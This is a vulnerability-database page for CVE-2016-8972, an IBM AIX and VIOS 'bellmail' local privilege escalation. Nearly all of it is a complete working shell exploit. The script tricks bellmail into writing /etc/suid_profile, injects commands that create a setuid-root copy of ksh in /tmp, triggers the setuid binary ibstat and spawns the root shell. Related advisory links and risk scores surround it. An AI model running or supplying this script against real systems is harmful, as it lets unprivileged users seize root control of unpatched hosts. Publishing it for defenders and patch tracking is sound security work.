Vulners
Lucene search
IBM AIX 6.1/7.1/7.2 - 'Bellmail' Local Privilege Escalation
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | IBM AIX 6.1/7.1/7.2 - Bellmail Privilege Escalation Vulnerability | 22 Dec 201600:00 | – | zdt |
 | AIX bellmail Advisory : bellmail_advisory.asc (IV91006) (IV91007) (IV91008) (IV91010) (IV91011) | 3 Aug 201700:00 | – | nessus |
| AIX 6.1 TL 9 : bellmail (IV91006) (deprecated) | 20 Dec 201600:00 | – | nessus |
| AIX 7.1 TL 3 : bellmail (IV91007) (deprecated) | 20 Dec 201600:00 | – | nessus |
| AIX 7.1 TL 4 : bellmail (IV91008) (deprecated) | 20 Dec 201600:00 | – | nessus |
| AIX 7.2 TL 0 : bellmail (IV91010) (deprecated) | 20 Dec 201600:00 | – | nessus |
| AIX 7.2 TL 1 : bellmail (IV91011) (deprecated) | 20 Dec 201600:00 | – | nessus |
 | Vulnerability in bellmail affects AIX,Vulnerability in bellmail affects VIOS | 15 Dec 201615:12 | – | aix |
 | IBM AIX Local Elevation of Privilege Vulnerability (CNVD-2016-13013) | 20 Dec 201600:00 | – | cnvd |
 | CVE-2016-8972 | 15 Feb 201719:00 | – | cve |
10
#!/usr/bin/sh
#
# CVE-2016-8972/bellmailroot.sh: IBM AIX Bellmail local root
#
# Affected versions:
# AIX 6.1, 7.1, 7.2
# VIOS 2.2.x
#
# Fileset Lower Level Upper Level KEY
# ---------------------------------------------------------
# bos.net.tcp.client 6.1.9.0 6.1.9.200 key_w_fs
# bos.net.tcp.client 7.1.3.0 7.1.3.47 key_w_fs
# bos.net.tcp.client 7.1.4.0 7.1.4.30 key_w_fs
# bos.net.tcp.client_core 7.2.0.0 7.2.0.1 key_w_fs
# bos.net.tcp.client_core 7.2.1.0 7.2.1.0 key_w_fs
#
# Ref: http://aix.software.ibm.com/aix/efixes/security/bellmail_advisory.asc
# Ref: https://rhinosecuritylabs.com/2016/12/21/unix-nostalgia-aix-bug-hunting-part-2-bellmail-privilege-escalation-cve-2016-8972/
# @hxmonsegur //RSL - https://www.rhinosecuritylabs.com
ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')
VULNBIN=/usr/bin/bellmail
SUIDPROFILE=/etc/suid_profile
function ESCALATE
{
echo "[*] Preparing escalation"
$VULNBIN >/dev/null 2>&1 <<EOD
s /etc/suid_profile
EOD
if [ ! -w $SUIDPROFILE ]; then
echo "[-] $SUIDPROFILE is not writable. Exploit failed."
exit 1
fi
echo "[*] Clearing out $SUIDPROFILE"
echo > /etc/suid_profile
echo "[*] Injecting payload"
cat << EOF >$SUIDPROFILE
cp /bin/ksh $ROOTSHELL
/usr/bin/syscall setreuid 0 0
chown root:system $ROOTSHELL
chmod 6755 $ROOTSHELL
rm -f $SUIDPROFILE
EOF
echo "[*] Executing SUID to leverage privileges"
/usr/bin/ibstat -a >/dev/null 2>&1
if [ ! -x $ROOTSHELL ]; then
echo "[-] Root shell does not exist or is not executable. Exploit failed."
exit 1
fi
echo "[*] Escalating to root.."
$ROOTSHELL
echo "[*] Make sure to remove $ROOTSHELL"
}
echo "[*] IBM AIX 6.1, 7.1, 7.2 Bellmail Local root @hxmonsegur//RSL"
$VULNBIN -e
if [ $? -eq 0 ]
then
ESCALATE
echo "[*] Make sure to remove $ROOTSHELL"
exit 0
fi
echo "[*] Sending mail to non-existent user, force a bounce within ~minute"
/usr/bin/mail nonexistentuser <<EOD
.
.
.
EOD
echo "[*] Waiting for mail to come in."
while true
do
$VULNBIN -e
if [ $? -eq 0 ]
then
echo "[*] Mail found"
ESCALATE
break
else
echo "[-] Mail not received yet. Sleeping."
sleep 10
fi
doneData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Dec 2016 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 27.2
CVSS 37.8
EPSS0.00627